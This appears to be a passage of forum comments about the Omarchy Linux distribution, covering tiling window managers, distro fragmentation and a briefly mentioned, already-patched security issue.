- sashank_1509 1mo agoUbuntu is good enough. I never got the point of tiling window managers, because the most important part of daily computing, browsing the web requires you to use the mouse. I’ve tried keyboard only browsers, none of them are as intuitive as just using a mouse and they can’t be, especially considering the prevalence of hyperlinks. I guess while coding it is nice, but I can switch between the terminal and my editor in a single key in Ubuntu itself so I don’t see the point of this.
- hellcow 1mo agovimium is my solution to the web.
- savory_pancake 1mo agoValid, but I’m unsure if mouse use needs to be mutually exclusive with a tiling window manager, and would like to suggest that all tiling managers are not necessarily made equal. Niri for example, tiles but additionally introduces an infinite horizontal space, where you can slide between different windows like they’re on a film strip. The slide into view works with a mouse, and you can easily setup mouse bindings to move and reset windows. I think it’s better than just a stock floating windows manager because it feels easier for me to navigate an infinitely wide left-right and up-down space as opposed to an infinitely deep space into and out of the screen.
- itsObviousToAll 1mo ago[dead]
- maxlin 1mo agoI don't see a responsible disclosure timeline, putting doubt on the black/greyhat hacker, but am not surprised this was patched post-haste, unlike some less caring operations. In any case, another reason to upgrade to Quattro! I just hope my 30€ Chromebook can handle it as well as it handled 3.
- zer0zzz 1mo agoI am a little unsure why folks keep getting convinced one new distro or another is gonna come and finally solve the Linux desktop adoption problem? The fundamental problem linux distros have is that they dont agree on a fundamental set of libraries, user experience, or have a stable abi. We've had minimal disros before, we've had maximal install-everything distros before, and we've had special purpose distros before (ie knoppix, mythbuntu, Kali). But the same adoption problem remains. Afaict Google and Valve have managed to meaningfully move things forward with chromeos, android, and steam OS. Tools like flatpak and others also have made a difference. But if you're really going the typical distro route, it confounds me what the point of going outside of the typical and common debian/redhat/arch systems are especially when its one guy. Hell, I still remember SprezzOS (Nick Black's Distro) and that thing had more real goals worth praising than anything I see from Omarchy.
- 0x5150 1mo ago[dead]
- po1nt 1mo agoI don't know much about Omarchy but this seems like a common way to use docker even on Ubuntu. As far as I know it's in the official guide. Why are so many people hating on the distro?
- kopirgan 1mo agoBigger question is does Linux need another distro at all?! I would say about as badly as Singapore needs a mall. There's no doubting the brilliance of DHH and folks working on it. What if that went to into making a better UI, Desktop like Mac. After all Apple did that so well when they moved to Unix core.
- satai 1mo agoSo they are both evil and incompetent? Why don't they just work for Microsoft? ;-)
- wulfkaal 22d ago[flagged]